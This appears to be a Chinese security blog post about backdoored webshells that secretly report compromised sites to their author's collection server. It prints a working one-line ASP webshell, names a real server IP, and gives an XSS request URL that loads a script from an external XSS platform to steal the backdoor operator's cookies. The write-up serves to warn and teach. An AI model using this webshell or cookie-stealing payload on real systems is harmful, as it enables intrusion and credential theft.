webshell盒子黑吃黑

0x00 前言

在测试过程中，往往会用到各种大马，一句话，菜刀等渗透工具，但是有想过这些工具是否存在后门吗?网上有不少破解程序使用，当你试图攻击别人时你已经变成了肉鸡。程序可能已被开发者植入了后门以便可以黑吃黑。感染到的设备都会变成后门开发者的，最终成为开发者组成的僵尸网络

0x01 webshell是什么

webshell:即web网站后门 getshell:是指拿webshell的过程

webshell就是一个asp或php木马后门，黑客在入侵了一个网站后，常常在将这些asp或php木马后门文件放置在网站服务器的web目录中，与正常的网页文件混在一起。然后黑客就可以用web的方式，通过asp或php木马后门控制网站服务器，包括上传下载文件、查看数据库、执行任意程序命令等操作，以达到控制网站服务器的目的

如一句话木马:短小精悍，而且功能强大，隐蔽性非常好，在入侵中始终扮演着强大的作用

工作原理：黑客在注册信息的电子邮箱或者个人主页等中插入类似的代码

<%execute request("U")%>

其中U是值，所以你可以更改自己的值，request就是获取这个值 <%eval>现在比较多见，而且字符少，对表单字数有限制的地方特别的实用。当知道了数据库的URL，就可以利用本地一张网页进行连接得到webshell。不知道数据库也可以，只要知道<%eval>这个文件被插入到哪一个ASP文件里面就可以了，这就被称作一句话木马

0x02 后门是什么

一般存在后门的话，所获得的shell会通过后门发送给箱子，那个箱子就是用来装shell的地方。后门的最主要目的就是方便以后再次秘密进入或者控制系统

0x03 实验

我们通过一个实验感受一下webshell黑吃黑"的过程

通过网站数据包分析到该网站有往外发送数据的情况，这个链接就证明了木马制作者在这个木马里面留了后门39.96.44.170就是这个木马制作者的服务器，而u=127.0.0.1:8080/help.php是我们下的木马的网址，pass=admin,表示这个木马的密码是admin

然后我们再分析一下木马help.php的文件

在webshell箱子里就会出现一条网站的相关信息

我们通过XSS来反搞一下获取到开发者的cookie信息，随便找一个xss的平台

跨站脚本攻击，就是把自己的另外一个站的恶意js代码插入受害者网站，偷cookie功能的实现，实际是这个js用get方式请求了某个url，把偷到的隐私数据发送过去。

尝试在浏览器地址栏输入

http://39.96.44.170/api.asp?url=http://www.dddd.com/help.php&pass=sCRiPt%20sRC=https://xss8.cc/q5v5发送执行

打开webshell箱子，就会看到已经获取到信息

成功接收数据，因此思路就是：在http://39.96.44.170/api.asp?url=http://www.dddd.com/help.php&pass=后面加上一句话密码就好了

再打开xss平台，就会发现已经获取到webshell的信息包括cookie，有了这些信息我们就能登录webshell箱子了

这波你以为我在第一层，然而这波我却在大气层！碟中谍！

0x04 小结

建议大家还是官网下载文件，要谨慎下载和执行任何来历不明的文件防止有诈。

本文仅供交流讨论，环境是本地搭建测试的，大家莫做违法事!